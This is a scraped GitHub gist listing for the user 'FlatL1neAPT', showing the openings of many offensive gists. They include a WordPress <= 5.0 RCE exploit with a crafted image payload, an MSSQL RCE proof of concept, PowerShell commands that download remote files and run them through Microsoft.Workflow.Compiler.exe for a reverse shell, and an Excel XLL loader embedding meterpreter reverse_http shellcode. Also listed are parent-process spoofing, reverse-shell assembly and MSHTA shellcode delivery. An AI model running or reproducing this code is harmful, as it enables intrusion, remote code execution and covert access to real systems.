Skip to content

Instantly share code, notes, and snippets.

View FlatL1neAPT's full-sized avatar
🏠
Working from home

FlatL1ne FlatL1neAPT

🏠
Working from home
205 followers · 38 following
View GitHub Profile
@FlatL1neAPT
FlatL1neAPT / process_spoof.c
Created January 23, 2019 14:17
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
@FlatL1neAPT
FlatL1neAPT / bad_sequel.py
Created January 29, 2019 07:23 — forked from 3xocyte/bad_sequel.py
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@FlatL1neAPT
FlatL1neAPT / wordpress-rce.js
Created March 3, 2019 07:39 — forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
@FlatL1neAPT
FlatL1neAPT / PowerShell_Command.txt
Created March 5, 2019 06:44 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
@FlatL1neAPT
FlatL1neAPT / reverse-tcs-auth-shell.nasm
Created March 10, 2019 18:24 — forked from alanvivona/reverse-tcp-auth-shell.nasm
; =================================================
; Password protected x64 TCP Reverse Shell
; Author: Alan Vivona
; =================================================
global _start
; Syscall numbers
syscalls.socket equ 0x29
syscalls.bind equ 0x31
@FlatL1neAPT
FlatL1neAPT / VitaLoader.java
Created March 11, 2019 17:49 — forked from xerpi/Now has a repository
Ghidra Vita loader script
//@author Sergi Granell
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
/*
* This script depends on the yamlbeans library.
* Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases
* and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration.
@FlatL1neAPT
FlatL1neAPT / shellcode_ExcelRegisterXLL.c
Created April 9, 2019 18:24 — forked from Arno0x/shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
@FlatL1neAPT
FlatL1neAPT / TestMSHTAShellcodeDelivery.ps1
Created April 11, 2019 06:40
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credtis for CACTUSTORCH HERE
I was in escape sequcence hell ;-)
' ( ) ( )
@FlatL1neAPT
FlatL1neAPT / noscript-tracking.go
Created May 3, 2019 15:01 — forked from wybiral/noscript-tracking.go
// Tracking cursor position in real-time without JavaScript
// Demo: https://twitter.com/davywtf/status/1124146339259002881
package main
import (
"fmt"
"net/http"
"strings"
)
@FlatL1neAPT
FlatL1neAPT / poc.png
Created May 21, 2019 21:30
MSBuild - Property functions -
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause